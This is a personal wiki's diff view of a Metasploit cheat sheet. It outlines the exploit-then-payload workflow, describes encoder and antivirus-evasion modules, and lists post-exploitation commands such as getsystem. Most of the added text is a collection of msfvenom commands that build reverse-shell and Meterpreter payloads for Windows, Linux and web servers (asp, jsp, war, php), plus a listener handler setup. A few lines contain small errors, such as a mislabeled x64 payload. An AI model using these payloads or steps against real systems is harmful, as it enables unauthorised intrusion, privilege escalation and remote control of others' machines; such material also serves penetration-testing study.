The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » cheat_sheets_metasploit
cheat_sheets_metasploit

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
cheat_sheets_metasploit [2022/12/28 00:33] – [Search for Module] gmancheat_sheets_metasploit [2022/12/31 21:50] (current) – [Two Common Commands] gman
Line 19: Line 19:
   * ''msfconsole'' starts the program and drops you off at a prompt: ''msf6 >'' (or ''msf5 >'')   * ''msfconsole'' starts the program and drops you off at a prompt: ''msf6 >'' (or ''msf5 >'')
   * Almost any Linux command can be run from the ''msf6'' prompt (e.g., ''ls'', ''ping'', ''clear'', etc.   * Almost any Linux command can be run from the ''msf6'' prompt (e.g., ''ls'', ''ping'', ''clear'', etc.
 +
 +==== 4 Main Activities ====
 +
 +There are 4 main activities you will most always do when using Metasploit:
 +  - Start the console: command line ''msfconsole''
 +    * Review available options at the ''msf'' prompt with: ''?''.
 +  - Select an exploit: this will get you into the target...
 +    * See a full list: ''show exploits''
 +    * Search: ''search [keyword]:[arg] [keyword]:[arg]''
 +  - Select a payload: this is what you want to do once you're in...
 +    * See a full list: ''show payloads''
 +  - Run the exploit: 
 +    * Set any necessary options first (e.g., rhost)
 +    * ''run'' your exploit
  
 ==== Help ==== ==== Help ====
Line 35: Line 49:
   * Example, CVE: ''search ms17-101''   * Example, CVE: ''search ms17-101''
   * Example, type: ''search type:auxiliary telnet''   * Example, type: ''search type:auxiliary telnet''
 +
 +**Alternative Search Option:** Rapid7 maintains a [[https://www.rapid7.com/db/?type=metasploit | searchable web-based exploit database]]. Find your exploit there and tell msf to use it.
  
 ''info'' - To see more information on the loaded module. You can see info on any module at any time by using the command ''info'' followed by the full path the module you need info on. ''info'' - To see more information on the loaded module. You can see info on any module at any time by using the command ''info'' followed by the full path the module you need info on.
  
-**Search Parameters (Keywords):**+**Parameters (Keywords):**
  
-^  Keyword  ^  Description  +^  Keyword   ^  Description                              
-| app  | client or server attack | + app       | client or server attack                   
-author  | search by module author | +|  author    | search by module author                   
-bid  | search by BugTrack ID | +|  bid       | search by BugTrack ID                     
-| cve  | search by CVE ID | + cve       | search by CVE ID                          
-| edb  | search by Exploit-DB ID | + edb       | search by Exploit-DB ID                   
-name  | search by descriptive name | +|  name      | search by descriptive name                
-| platform  | search by platform (Windows, Linux, etc.) | + platform  | search by platform (Windows, Linux, etc.) | 
-| ref  | modules with a specific ref. | + ref       | modules with a specific ref.              
-| type  | search by type (exploit, auxiliary, post) |+ type      | search by type (exploit, auxiliary, post) |
  
 ==== Search Result Ranking ==== ==== Search Result Ranking ====
Line 114: Line 130:
 ===== Modules & Categories ===== ===== Modules & Categories =====
  
-**[1] Auxiliary:** Any supporting module, such as scanners, crawlers and fuzzers. Found here:+==== [1] Auxiliary ==== 
 + 
 +Any supporting module, such as scanners, crawlers and fuzzers. Found here:
  
 <code>/usr/share/metasploit-framework/modules/auxiliary</code> <code>/usr/share/metasploit-framework/modules/auxiliary</code>
  
-**[2] Encoders:** Allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.+==== [2] Encoders ==== 
 + 
 +Allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.
   * Encoders can have a limited success rate as antivirus solutions can perform additional checks.   * Encoders can have a limited success rate as antivirus solutions can perform additional checks.
   * Found here:   * Found here:
Line 124: Line 144:
 <code>/usr/share/metasploit-framework/modules/encoders</code> <code>/usr/share/metasploit-framework/modules/encoders</code>
  
-**[3] Evasion:** Direct attempts to evade antivirus software.+==== [3] Evasion ==== 
 + 
 +Direct attempts to evade antivirus software.
   * Encoders will encode the payload and thus obfuscate the signature.   * Encoders will encode the payload and thus obfuscate the signature.
   * Evasion modules are an actual direct attempt to evade antivirus software.   * Evasion modules are an actual direct attempt to evade antivirus software.
Line 130: Line 152:
 <code>/usr/share/metasploit-framework/modules/evasion</code> <code>/usr/share/metasploit-framework/modules/evasion</code>
  
-**[4] Exploits:** Modules that... well... exploit. Very neatly organized by target system here:+==== [4] Exploits ==== 
 + 
 +Modules that... well... exploit. Very neatly organized by target system here:
  
 <code>/usr/share/metasploit-framework/modules/exploits</code> <code>/usr/share/metasploit-framework/modules/exploits</code>
  
-**[5] NOPs:** NOPs (No OPeration) do nothing, literally.+==== [5] NOPs ==== 
 + 
 +NOPs (No OPeration) do nothing, literally.
   * They are often used as a buffer to achieve consistent payload sizes.   * They are often used as a buffer to achieve consistent payload sizes.
  
 <code>/usr/share/metasploit-framework/modules/nops</code> <code>/usr/share/metasploit-framework/modules/nops</code>
  
-**[6] Payloads:** Payloads are codes that will run on the target system.+==== [6] Payloads ==== 
 + 
 +Payloads are codes that will run on the target system.
   * Exploits leverage a vulnerability to gain access on a target system, but to achieve our goal we need a payload.   * Exploits leverage a vulnerability to gain access on a target system, but to achieve our goal we need a payload.
   * Examples: get a shell, load malware, load a backdoor, run a command, etc.   * Examples: get a shell, load malware, load a backdoor, run a command, etc.
Line 159: Line 187:
     * Example: ''windows/x64/shell/reverse_tcp''     * Example: ''windows/x64/shell/reverse_tcp''
  
-**[7] Post:** Post modules are useful during the final, post-exploitation phase. Found here:+==== [7] Post ==== 
 + 
 +Post modules are useful during the final, post-exploitation phase. Found here:
  
 <code>/usr/share/metasploit-framework/modules/post</code> <code>/usr/share/metasploit-framework/modules/post</code>
  
 ---- ----
 +
 +===== Syntax (Examples) =====
 +
 +==== Two Common Commands ====
 +
 +After a successful exploit (and assuming your payload was Meterpreter), two common commands you will likely often want to try: 
 +
 +<code>
 +# priv esc to admin
 +getsystem
 +
 +# get a shell in the exploit directory on the target
 +shell
 +</code>
 +
 +
 +==== msfvenom ====
 +
 +See [[cheat_sheets_various#msfvenom | here]].       
 +
 +==== MSF Handler ====
 +
 +''msfconsole''...Handlers should be in the following format:
 +
 +<code>
 +use exploit/multi/handler
 +set PAYLOAD <Payload name>
 +set LHOST <LHOST value>
 +set LPORT <LPORT value>
 +</code>
 +
 +==== Non-Meterpreter Binaries ====
 +
 +**Staged Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Stageless Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Staged Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +**Stageless Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +==== Non-Meterpreter Web Payloads ====
 +
 +<code>
 +# asp 
 +msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
 +
 +# jsp
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
 +
 +# war
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
 +
 +# php
 +msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
 +</code>
 +
 +==== Meterpreter Binaries ====
 +
 +**Staged Payloads for Windows**
 +
 +<code>
 +
 +# x86
 +msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Stageless Payloads for Windows**
 +
 +<code>
 +# x86
 +msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
 +
 +# x64
 +msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
 +</code>
 +
 +**Staged Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +**Stageless Payloads for Linux**
 +
 +<code>
 +# x86
 +msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
 +
 +# x64
 +msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
 +</code>
 +
 +==== Meterpreter Web Payloads ====
 +
 +<code>
 +# asp
 +msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
 +
 +# jsp
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
 +
 +# war
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
 +
 +# php
 +msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
 +</code>
  
cheat_sheets_metasploit.1672187607.txt.gz · Last modified: by gman